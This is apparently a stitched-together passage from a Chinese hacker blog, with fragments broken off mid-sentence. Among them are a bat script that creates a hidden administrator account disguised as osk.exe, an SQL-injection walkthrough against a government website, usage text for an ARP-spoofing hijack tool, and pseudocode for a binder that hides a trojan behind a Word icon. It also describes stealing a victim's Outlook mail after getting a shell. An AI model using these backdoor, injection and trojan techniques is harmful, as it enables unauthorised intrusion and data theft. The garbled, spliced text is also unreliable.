不想说什么了，能看懂的朋友自己看看，看不懂的朋友去问问。
过程中需要的osk.exe 内容是由下面的bat转换而来

net user IISDebugger 'ccteam' /add
net localgroup administrators IISDebugger /add

演示地址:http://www.virhost.net/up_files/soft/imerdp.html
相关工具osk.exe 下载地址:http://www.virhost.net/up_files/soft/osk.exe.mdb
imerdp_win下载地址http://www.virhost.net/up_files/soft/imerdp_win.rar.mdb

 

win下的ImeRdp今天正式在邮件列表发布了！

    软件功能:    远程桌面中开启指定输入法.
    受影响系统有:
        vista                            

 一共有 11 个，其中 6 个严重级别，5 个重要级别。

严重级别的有：

MS08-007
WebDAV Mini-Redirector 中的漏洞可能允许远程执行代码 (946026)
http://www.microsoft.com/china/technet/security/bulletin/ms08-007.mspx

MS08-008
OLE 自动化中的漏洞可能允许远程执行代码 (947890)
http://www.microsoft.com/china/technet/security/bulletin/ms08-008.mspx

MS08-009
Microsoft Word 中的漏洞可能允许远程执行代码 (947077)

 

渗透某政府网站 转的是耗子的

 

http://jxsaqjh.cn/article.asp?id=37

 

 

适合新手去学习

 

这是第一次接触PHP注入，所有的东西都是在入侵中自己找到的。
    是一个政府的网站，这个城市和我还有些渊源，在这里就不多说了！在主页找了一个PHP？ID=的连接，加个'返回出错了，继续and 1=1 正常 and 1=2 出错，运气不错，下面查表段数量，用 order by ,可是后面的数字换成任何都出错，遂手动递加，id=-1 union select  1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 到了15暴出数字了，第一次有这样的收获，高兴

 在中国短暂而一度喧嚣的黑客历史上，几乎从没有过纯粹的时光，它一再被捆绑和裹胁，最先是爱国精神，然后是商业利益，现在则几乎成了犯罪的代名词

　　六年前，“中国鹰盟”成立之初，黑客万涛吟咏着“我们要做民族的精英，我们会永远战斗不息”，他的经典台词是为刺刀装上理想，像拿破仑的军队那样。

　　现在，2007年9月11日，远在成都出差的中年白领，惦记着夜晚的宵夜，然后悲哀地承认，如今的黑客圈是“名利场和大染缸”，他宁愿选择“永远缅怀”。

　　龚蔚，十年前成立中国第一个黑客组织——“绿色兵团”，如今甚至都已不愿轻言往事，“那是一段成长的历史”，他说自己反思过，检讨过，再无重温的激情，江湖也早无goodwell（网名）。

　　尽管源于上世纪60年代美国的“黑客”（Hacker）一词，最初的含义只关乎技术，指那些尽力挖掘计算机程序的最大潜力的电脑精英，但在中国短暂而一度喧嚣的黑客历史上，几乎从没有过纯粹的时光，它一再被捆绑和裹胁，最先是爱国精神，然后是商业利益，现在则几乎成了犯罪的代名词。

　　“当你企图用文化去解构技术，它也许会发展成科学，也许会发展成巫术

 usage: hijack <-LVXhefvqsxrkHDtNzoi> <-d dev> <-S interval> <-l logfile>
<-W normal|byline|none> <-F jobfile> <-p port> <-c http_flag>
<-IO pcap_dump> <-E quit time> <-R reboot time>
<-b submask> <-m speed> <Source Host> <Dest Host>
<match expression> <bpf filter> | <genuine host> <faked host>
-h is help/usage 显示帮助信息
-V is version information 显示版本信息
-v is be verbose 程序运行时显示详细信息
-q is be quiet (don't print packet reception hash marks) 安静模式，不显示数据包标识
-e is show empty packets 显示空的数据包
-o is fixed '\0' after replace data offset 替换数据后，被替换的数据后都用空字节'\0'填充
-i is ignore case 忽略大小写进行匹配
-S is spoof interval default is 3000 ms 设置发送RARP欺骗的时间间隔,不能设太大，不然程序会死，条件竞争问题 针对攻击一些反ARP欺骗的主机, 越小越好
-l is set log

 最近工作上事太多.没有怎么更新BLOG 郁闷的.好不容易弄点时间搞搞.

 

写点啥吧.

 

ps: 真正的牛人是很低调的.现在网络上能装的人太J8多了.受不了.

 

继续装,装吧.装了有啥J8意思.真正的HACKER 不是装出来的.是做出来的.

 

  以上是个人看法.有啥意见找我. 最近工作上的感牾.发泄一下.

 在系统容错允许下，于EXE文件末尾添加数据，EXE文件是可以正常执行的。我们要做就是把木马的数据和Word文挡的数据写到伪装器的尾部。结构如下：
---------------------------------------
|bind.exe|muma.exe|Word.doc|
---------------------------------------
当捆绑的bind.exe运行后，读取捆绑的数据生成muma.exe和Word.doc一并运行，而自身则结束进程。当然这里bind.exe要做的远比我说的要复杂的多，它还承担写数据的功能。
程序界面。
首先说说如何利用Word的图标，前面提到我们是把数据写到伪装器尾部，可见最后生成的捆绑程序利用的是伪装器的图标，所有我们直接把伪装器的图标换成Word文档的图标。
本程序代码中Bind_Files()函数负责写数据到伪装器的尾部。伪代码如下：
Bind_Files()
{
_stat(my_name, &ST);//获取自身文件伪装信息
fread(buf, 1, modify_data.my_length, myself);//储存自身文件信息到缓冲区
out = fopen('xicao.exe', 'wb');//创建最终合成文件
fwrite(buf, 1, bytesin, out);//写入第一个要伪装的文件数据
fwrite(buf, 1, bytesin, out);//写入第二

 最近通过漏洞溢出得到了一台机器的Shell，发现该机器的主人使用Outlook Express6（以后简称OE6）收发邮件，同时该机器在硬盘上积累了非常多的邮件，我想将邮件拷过来看看，但是dbx文件足足有1.5G之多。本人特开发了一个小小的软件，特向各位黑客编程爱好者公开自己的一些成果，希望得到大家宝贵的意见。
基础知识
Windows给每个用户、用户组和计算机都分配了一个安全的ID（SID），安全引用监视器用此SID控制对各种安全对象的访问。这个道理大家都明白，然而不是每个人在编写程序时都考虑到了这个因素，很多人都以为当得到一台机器的Shell后将程序上传执行就能得到理想的结果了。其实不然，在Shell中对各种安全对象的访问与当前活动用户对各种安全对象的访问是完全不同的，比如我的程序是对OE6中存储的邮件进行筛选，当我双击运行时能将满足要求的邮件提取出来。而在Shell中运行时却得不到结果，经过我的仔细的研究，发现由于SID不同，造成程序访问的邮件路径也完全不同。本地双击运行时访问的是“C:\Documents and Settings\Administrator\Local Settings\Application Data\Identities\ {5F0D737E-53DF-4A51-8061-179B70D61CA3}\Microsoft\Outlook Exp

 

日!就一个卖木马的B 骗钱的 N年前就知道这鸟站了,抓了活该,.

 

 国家不管你是什么人，做了就抓。杀鸡给猴看，被抓的很多，报道的倒少，如果你在做这些事，等哪天你被抓了你就明白了。电视上报道的网监都不是他们的功劳，正真做事的是安全公司